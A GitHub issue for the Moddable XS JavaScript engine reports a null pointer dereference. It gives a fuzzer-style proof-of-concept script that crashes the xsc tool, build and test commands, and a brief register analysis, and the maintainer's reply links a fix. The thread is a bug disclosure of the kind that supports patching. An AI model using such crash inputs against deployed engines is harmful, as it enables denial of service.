Moddable-OpenSource/moddable #353: NULL pointer dereference

rain6851, 2020-04-24:
# Enviroment
```
operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make

test command: ./xsc poc
```
# poc:
```
function main() {
    const v2 = [
        13.37,
        13.37, 13.37,
        13.37,
        13.37
    ];
    const v3 = [];
    let v4 = v3;
    function v5(v6, v7) {
        let v10 = 0;
        while (v10 < 10) {
            const v17 = [1337];
            const v18 = [v17];
            const v19 = {
                c: -2589926580,
                __proto__: v18,
                a: -2589926580
            };
            const v21 = new Set('__proto__');
            const v22 = v21.add(v19);
            const v23 = v22.clear();
            for (let v24 = 0; v24 < 8; v24++) {
                for (let v28 = 0; v28 < 5; v28++) {
                }
            }
            const v29 = v10 + 1;
            v10 = v29;
        }
    }
    const v30 = [];
    let v31 = v30;
    const v32 = v5(...v31, v4, ...v2, 10, 13.37);
}while();
```
# vulnerability analysis

We can see that the value of rdx is 0, but the program accesses memory through rdx, which is an obvious null pointer dereference vulnerability.

[image]

[image]

The location of the vulnerability is as follows:

[image]

rain6851, 2020-04-24:
@bterlson @rwaldron @pmcneil @nodebotanist please check the issue

rain6851, 2020-05-05:
@phoddie @mkellner @Moddable-OpenSource please check the issue

phoddie, 2020-05-07:
[Fix](https://github.com/Moddable-OpenSource/moddable/commit/723816ab9b52f807180c99fc69c7d08cf6c6bd61) pushed.

closed 2020-05-22 by phoddie